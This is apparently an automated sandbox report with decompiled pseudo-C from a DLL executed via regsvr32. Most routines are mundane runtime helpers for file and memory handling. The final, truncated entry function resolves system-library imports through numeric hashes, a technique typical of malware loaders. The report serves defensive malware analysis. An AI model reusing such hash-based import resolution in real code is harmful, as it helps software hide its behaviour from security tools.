                                                                                                            				_t42 = _a4;
                                                                                                            				_v12 = _a8;
                                                                                                            				_push(_t38);
                                                                                                            				_v8 = _a12;
                                                                                                            				_t21 = E1001B08D(_t42);
                                                                                                            				_t39 = _t38 | 0xffffffff;
                                                                                                            				if(_t21 != _t39) {
                                                                                                            					_t22 = SetFilePointer(_t21, _v12,  &_v8, _a16);
                                                                                                            					_v12 = _t22;
                                                                                                            					if(_t22 != _t39 || GetLastError() == 0) {
                                                                                                            						_t15 = ((_t42 & 0x0000001f) + (_t42 & 0x0000001f) * 8) * 4; // 0x0
                                                                                                            						 *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) & 0x000000fd;
                                                                                                            						_t27 = _v12;
                                                                                                            					} else {
                                                                                                            						E10013707(_t28);
                                                                                                            						goto L5;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            					L5:
                                                                                                            					_t27 = _t39;
                                                                                                            				}
                                                                                                            				return _t27;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,1004C878,00000001,00000000,00000000,00000000,1004C878,1004C878,?,10019815,?,00000000,00000000,00000002,00000000,1004C878), ref: 1001B1CC
                                                                                                            • GetLastError.KERNEL32 ref: 1001B1D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction ID: 53af0a452f36b2f0e5d3ec892390ecf8c1e17cdf248c2bebef8a867a22bb85e5
                                                                                                            • Opcode Fuzzy Hash: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction Fuzzy Hash: FD018476A10659FFCB01DF99CC94C9E7BB9EF45360B154259F410DB191EB70EE808760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001968C(void* __eflags, signed int _a4, long _a8, long _a12) {
                                                                                                            				void* _t11;
                                                                                                            				long _t13;
                                                                                                            				signed int _t17;
                                                                                                            				signed int _t19;
                                                                                                            				signed int _t27;
                                                                                                            				signed int _t29;
                                                                                                            
                                                                                                            				_t29 = _a4;
                                                                                                            				_t11 = E1001B08D(_t29);
                                                                                                            				if(_t11 != 0xffffffff) {
                                                                                                            					_t27 = SetFilePointer(_t11, _a8, 0, _a12);
                                                                                                            					if(_t27 != 0xffffffff) {
                                                                                                            						_t13 = 0;
                                                                                                            					} else {
                                                                                                            						_t13 = GetLastError();
                                                                                                            					}
                                                                                                            					if(_t13 == 0) {
                                                                                                            						_t9 = ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4; // 0x1004c87c
                                                                                                            						 *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) & 0x000000fd;
                                                                                                            						_t17 = _t27;
                                                                                                            					} else {
                                                                                                            						_t17 = E10013707(_t13) | 0xffffffff;
                                                                                                            					}
                                                                                                            					return _t17;
                                                                                                            				} else {
                                                                                                            					_t19 = E100136F5();
                                                                                                            					 *_t19 = 9;
                                                                                                            					return _t19 | 0xffffffff;
                                                                                                            				}
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,00000000,10019757,1004C878,00000000,10015998,10042D38,0000000C,1001566D,?,00000000,00000002), ref: 100196B9
                                                                                                            • GetLastError.KERNEL32 ref: 100196C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction ID: a629910bf8626f7fffa0a6a4af3c3ed297814fe42fece7765db2dd3634906eea
                                                                                                            • Opcode Fuzzy Hash: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction Fuzzy Hash: 2201A4362096616BCA11DF7CAC5594A3B94DB86370F220749F570CF1E1DB30EC818771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10025478(void* __ecx, void* _a4, long _a8) {
                                                                                                            				void* __ebp;
                                                                                                            				int _t8;
                                                                                                            				long _t13;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            
                                                                                                            				_t12 = __ecx;
                                                                                                            				_t13 = _a8;
                                                                                                            				_t14 = __ecx;
                                                                                                            				if(_t13 != 0) {
                                                                                                            					_t8 = WriteFile( *(__ecx + 4), _a4, _t13,  &_a8, 0);
                                                                                                            					if(_t8 == 0) {
                                                                                                            						_t8 = E100271C6(_t15, GetLastError(),  *((intOrPtr*)(_t14 + 0xc)));
                                                                                                            					}
                                                                                                            					if(_a8 != _t13) {
                                                                                                            						_push( *((intOrPtr*)(_t14 + 0xc)));
                                                                                                            						_push(0xffffffff);
                                                                                                            						_push(0xd);
                                                                                                            						return E10027180(_t12);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10025493
                                                                                                            • GetLastError.KERNEL32(?), ref: 100254A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 442123175-4125583295
                                                                                                            • Opcode ID: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction ID: 1efd054c324430f6bdfd1b59f081dc2d54efa2d2671d6c80a9c9a9e690e28720
                                                                                                            • Opcode Fuzzy Hash: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction Fuzzy Hash: 74F0A7362006187FDB11AF96EC04F87BBACEF40772F40C11AF92985060D731D5508B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10025438(void* __ecx, void* _a4, long _a8) {
                                                                                                            				void* __ebp;
                                                                                                            				void* _t15;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_t15 = __ecx;
                                                                                                            				if(_a8 != 0) {
                                                                                                            					if(ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0) == 0) {
                                                                                                            						E100271C6(_t16, GetLastError(),  *((intOrPtr*)(_t15 + 0xc)));
                                                                                                            					}
                                                                                                            					return _a8;
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 10025457
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10025464
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction ID: 9f7230fa58b18192531b9e87cef107ece2d112799f9fd2653fc72eebc1d7825c
                                                                                                            • Opcode Fuzzy Hash: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction Fuzzy Hash: EDE09232100218BFDB01AFA0EC04FCAB7ACEF08266F80C426FD19C9020D731EA509B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				intOrPtr _v272;
                                                                                                            				intOrPtr _v276;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t39;
                                                                                                            				int _t40;
                                                                                                            				void* _t50;
                                                                                                            				char* _t51;
                                                                                                            				intOrPtr _t52;
                                                                                                            				char* _t61;
                                                                                                            				signed int _t62;
                                                                                                            				CHAR* _t64;
                                                                                                            				signed int _t73;
                                                                                                            				void* _t74;
                                                                                                            				CHAR* _t82;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t87;
                                                                                                            
                                                                                                            				_t39 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t39;
                                                                                                            				_v272 = __ecx;
                                                                                                            				if(_a12 == 0) {
                                                                                                            					L10:
                                                                                                            					_t40 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					L11:
                                                                                                            					return E100117AE(_t40, _v8);
                                                                                                            				}
                                                                                                            				_t73 = _a8 << 2;
                                                                                                            				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
                                                                                                            				if(_t85 == 0) {
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t77 = _a4;
                                                                                                            				_t82 = E100017D0(_a4, _t85 + 1);
                                                                                                            				if(_t82 == 0) {
                                                                                                            					E1001CE3B(_t77);
                                                                                                            				}
                                                                                                            				_t74 = lstrcpynA;
                                                                                                            				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
                                                                                                            				_t50 = E10038481(_t82, 0, 0);
                                                                                                            				_t51 = _a16;
                                                                                                            				_t87 = _t85 - _t50 + 1;
                                                                                                            				_v276 = _t87;
                                                                                                            				if(_t87 != _t51) {
                                                                                                            					L7:
                                                                                                            					_t52 = _v272;
                                                                                                            					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
                                                                                                            					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
                                                                                                            						_a12 = _t87 + _t82;
                                                                                                            						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
                                                                                                            						__eflags = 0x104;
                                                                                                            						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
                                                                                                            						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				} else {
                                                                                                            					_t61 = _t51 + _t82;
                                                                                                            					_a11 =  *((intOrPtr*)(_t87 + _t82));
                                                                                                            					_a16 = _t61;
                                                                                                            					 *_t61 = 0;
                                                                                                            					_t62 = lstrcmpiA(_a12, _t82);
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t64 =  ~_t62 + 1;
                                                                                                            					_a12 = _t64;
                                                                                                            					 *((char*)(_t87 + _t82)) = _a11;
                                                                                                            					if(_t64 == 0) {
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
                                                                                                            					lstrcpynA(_t82,  &_v268, 0x104);
                                                                                                            					L9:
                                                                                                            					E10006CE2(_t74, _a4, _t82, 0xffffffff);
                                                                                                            					_t40 = 1;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            			}





















                                                                                                            0x00000000
                                                                                                            0x10024d4b
                                                                                                            0x10024d59
                                                                                                            0x10024da7
                                                                                                            0x10024dac
                                                                                                            0x10024db3
                                                                                                            0x00000000
                                                                                                            0x10024db4

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                                                              • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                                                              • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1551867014-0
                                                                                                            • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                                                            • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013EDE() {
                                                                                                            				signed int _t15;
                                                                                                            				void* _t17;
                                                                                                            				void* _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				void* _t24;
                                                                                                            				signed int _t26;
                                                                                                            				void* _t27;
                                                                                                            				intOrPtr* _t30;
                                                                                                            
                                                                                                            				_t15 =  *0x10050a48; // 0x0
                                                                                                            				_t26 =  *0x10050a58; // 0x0
                                                                                                            				if(_t15 != _t26) {
                                                                                                            					L4:
                                                                                                            					_t27 =  *0x10050a4c; // 0x0
                                                                                                            					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                                                            					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
                                                                                                            					 *(_t30 + 0x10) = _t17;
                                                                                                            					if(_t17 != 0) {
                                                                                                            						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                                                            						 *(_t30 + 0xc) = _t18;
                                                                                                            						if(_t18 != 0) {
                                                                                                            							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                                                            							 *_t30 = 0;
                                                                                                            							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                                                            							 *0x10050a48 =  *0x10050a48 + 1;
                                                                                                            							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                                                            							_t20 = _t30;
                                                                                                            						} else {
                                                                                                            							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L5:
                                                                                                            						_t20 = 0;
                                                                                                            					}
                                                                                                            					return _t20;
                                                                                                            				} else {
                                                                                                            					_t2 = _t26 * 4; // 0x50
                                                                                                            					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
                                                                                                            					if(_t24 != 0) {
                                                                                                            						 *0x10050a58 =  *0x10050a58 + 0x10;
                                                                                                            						 *0x10050a4c = _t24;
                                                                                                            						_t15 =  *0x10050a48; // 0x0
                                                                                                            						goto L4;
                                                                                                            					} else {
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3499195154-0
                                                                                                            • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                                                            • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10037A1B(signed int _a4) {
                                                                                                            				struct _CRITICAL_SECTION* _t13;
                                                                                                            				signed int _t21;
                                                                                                            				intOrPtr* _t24;
                                                                                                            
                                                                                                            				if( *0x1004f350 == 0) {
                                                                                                            					E100379F7();
                                                                                                            				}
                                                                                                            				_t21 = _a4;
                                                                                                            				_t24 = 0x1004f158 + _t21 * 4;
                                                                                                            				if( *_t24 == 0) {
                                                                                                            					EnterCriticalSection(0x1004f19c);
                                                                                                            					if( *_t24 == 0) {
                                                                                                            						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
                                                                                                            						 *_t24 =  *_t24 + 1;
                                                                                                            					}
                                                                                                            					LeaveCriticalSection(0x1004f19c);
                                                                                                            				}
                                                                                                            				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
                                                                                                            				EnterCriticalSection(_t13);
                                                                                                            				return _t13;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                                                              • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                            • String ID:
                                                                                                            • API String ID: 713024617-0
                                                                                                            • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                                                            • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.4%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:436
                                                                                                            Total number of Limit Nodes:23

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
                                                                                                            				void* _v4;
                                                                                                            				void* _t36;
                                                                                                            				void* _t39;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				intOrPtr _t44;
                                                                                                            				intOrPtr _t45;
                                                                                                            				intOrPtr _t46;
                                                                                                            				intOrPtr _t47;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr _t49;
                                                                                                            				intOrPtr _t50;
                                                                                                            				intOrPtr _t51;
                                                                                                            				intOrPtr _t52;
                                                                                                            				intOrPtr _t53;
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t55;
                                                                                                            				intOrPtr _t56;
                                                                                                            				intOrPtr _t57;
                                                                                                            				intOrPtr _t58;
                                                                                                            				intOrPtr _t59;
                                                                                                            				intOrPtr _t60;
                                                                                                            				intOrPtr _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr _t63;
                                                                                                            				intOrPtr _t64;
                                                                                                            				struct HRSRC__* _t65;
                                                                                                            				signed int _t68;
                                                                                                            				signed int _t69;
                                                                                                            				void* _t77;
                                                                                                            				void* _t79;
                                                                                                            				intOrPtr _t83;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t96;
                                                                                                            				void* _t97;
                                                                                                            				signed int _t99;
                                                                                                            				signed int _t100;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t113;
                                                                                                            				long _t117;
                                                                                                            				signed int _t119;
                                                                                                            				void* _t121;
                                                                                                            				struct HRSRC__* _t123;
                                                                                                            				int _t124;
                                                                                                            				void* _t127;
                                                                                                            				struct HINSTANCE__* _t128;
                                                                                                            				signed int _t129;
                                                                                                            				void* _t133;
                                                                                                            				signed int _t138;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t152;
                                                                                                            				signed int _t157;
                                                                                                            				intOrPtr _t182;
                                                                                                            
                                                                                                            				if(_a8 != 1) {
                                                                                                            					L6:
                                                                                                            					return 1;
                                                                                                            				} else {
                                                                                                            					_t36 = E10005040(__edi);
                                                                                                            					_t181 = _t36;
                                                                                                            					if(_t36 != 0) {
                                                                                                            						_push(0x1003ce28);
                                                                                                            						E10011135(__ebx, __edi, __esi, __eflags);
                                                                                                            						__eflags = 0;
                                                                                                            						return 0;
                                                                                                            					} else {
                                                                                                            						_push(__ebx);
                                                                                                            						_push(__ebp);
                                                                                                            						_push(__esi);
                                                                                                            						_push(__edi);
                                                                                                            						_push(L"kernel32.dll");
                                                                                                            						_push(0x3801a8f2);
                                                                                                            						_push(0x1a322e2e);
                                                                                                            						_push(0x628ad09);
                                                                                                            						_push(0x31c6c0a1);
                                                                                                            						_push(0x28b4cee6);
                                                                                                            						 *0x1004b0d8 = 0;
                                                                                                            						 *0x1004b0dc = 0;
                                                                                                            						 *0x1004b0e0 = 0;
                                                                                                            						 *0x1004b0e8 = 0;
                                                                                                            						 *0x1004b0e4 = 0;
                                                                                                            						 *0x1004b0ec = 0;
                                                                                                            						 *0x1004b0f0 = 0;
                                                                                                            						_t39 = E10001E60(_t181);
                                                                                                            						_push(L"ntdll.dll");
                                                                                                            						_push(0x1c9cdc39);
                                                                                                            						_push(0x2d34cc91);
                                                                                                            						_push(0x118db97f);
                                                                                                            						_push(0x348b2998);
                                                                                                            						_push(0x3446e98c);
                                                                                                            						_t127 = _t39;
                                                                                                            						_t40 = E10001E60(_t181);
                                                                                                            						_push(L"msvcrt.dll");
                                                                                                            						_push(0xe094f82);
                                                                                                            						_push(0x20e23fe3);
                                                                                                            						_push(0x156af904);
                                                                                                            						_push(0x108d4cdc);
                                                                                                            						_push(0x106d66fc);
                                                                                                            						_t121 = E10001E60(_t181);
                                                                                                            						_push(0x3ee42795);
                                                                                                            						_push(_t121);
                                                                                                            						_t42 = E10001FF0();
                                                                                                            						_push(0x402c2791);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3f0 = _t42;
                                                                                                            						_t43 = E10001FF0();
                                                                                                            						_push(0xb29018f0);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3ec = _t43;
